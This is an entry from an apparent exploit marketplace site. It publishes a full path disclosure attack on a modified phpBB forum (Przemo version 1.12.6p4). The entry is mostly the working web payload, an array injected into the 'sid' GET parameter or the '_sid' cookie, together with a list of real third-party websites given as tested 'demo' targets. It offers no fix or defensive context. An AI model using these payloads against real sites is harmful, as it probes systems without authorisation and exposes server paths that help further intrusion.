[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpBB modified by Przemo Full Path Disclosure Vulnerability

Author
siurek22
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14688
Category
web applications
Date add
02-11-2010
Platform
php
===========================================================
phpBB modified by Przemo Full Path Disclosure Vulnerability
===========================================================

# Author: siurek22
# Software Link: http://www.przemo.org/phpBB2/index.php?id=0
# Version: 1.12.6p4
# Category:: webapps
# Tested on: http://www.przemo.org/phpBB2/forum/
# Demo site:
http://www.przemo.org/phpBB2/forum/
http://www.infa-wat.webd.pl/
http://u-crew.tk/ -- works only cookie

Just set array :)

Vulnerability in cookie "_sid" and method GET sid:

http://example.com/login.php?sid[]=

or put to the cookie "_sid":

bb8536eb00_sid[]=12345



#  0day.today [2024-12-24]  #